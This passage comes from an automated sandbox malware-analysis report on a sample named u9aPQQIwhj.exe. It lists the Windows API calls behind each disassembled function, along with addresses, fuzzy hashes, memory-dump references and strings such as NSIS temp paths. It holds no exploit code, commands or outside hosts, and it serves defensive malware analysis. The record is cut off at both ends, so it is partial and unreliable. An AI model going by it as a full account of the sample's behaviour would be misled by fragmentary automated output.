                                                  • Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                                                  • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                                                  • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                                                  • Opcode Fuzzy Hash: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                                                  • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
                                                  • GetSysColor.USER32(?), ref: 004043AA
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                  • lstrlenW.KERNEL32(?), ref: 004043CB
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                  • SendMessageW.USER32(00000000), ref: 0040444D
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                  • SetCursor.USER32(00000000), ref: 004044CC
                                                  • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                  • SetCursor.USER32(00000000), ref: 004044F0
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: AB@$Call$N$open
                                                  • API String ID: 3615053054-1375180041
                                                  • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                  • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                  • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                  • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                  • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                    • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                  • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                  • wsprintfA.USER32 ref: 00405C7E
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                    • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405B58
                                                    • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                  • API String ID: 1265525490-3322868524
                                                  • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                  • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                  • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                  • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                  • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                  • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                  • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 10002391
                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                  • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                  • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                  • String ID: @Hmu
                                                  • API String ID: 3579998418-887474944
                                                  • Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                  • Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
                                                  • Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                  • Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061DF
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061F3
                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00406206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-999210136
                                                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                  • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                  • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                  • String ID: 8$C:\Users\user\AppData\Local\Temp\nsh4048.tmp$C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll
                                                  • API String ID: 1453599865-3490629075
                                                  • Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                                                  • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                  • Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                                                  • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                  • GetSysColor.USER32(00000000), ref: 004041CD
                                                  • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                  • SetBkMode.GDI32(?,?), ref: 004041E5
                                                  • GetSysColor.USER32(?), ref: 004041F8
                                                  • SetBkColor.GDI32(?,?), ref: 00404208
                                                  • DeleteObject.GDI32(?), ref: 00404222
                                                  • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D
                                                    • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                  • String ID: 9
                                                  • API String ID: 1149667376-2366072709
                                                  • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                  • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                  • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                  • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                  APIs
                                                  • wsprintfW.USER32 ref: 100024E1
                                                  • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                    • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,74DEFFC0,100011AA,?,00000000), ref: 1000131E
                                                  • GlobalFree.KERNEL32(?), ref: 10002562
                                                  • GlobalFree.KERNEL32(00000000), ref: 1000258B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 2435812281-0
                                                  • Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                                                  • Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
                                                  • Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                                                  • Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                  • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                  • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                  • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                                                  • GetTickCount.KERNEL32 ref: 00402D51
                                                  • wsprintfW.USER32 ref: 00402D7F
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
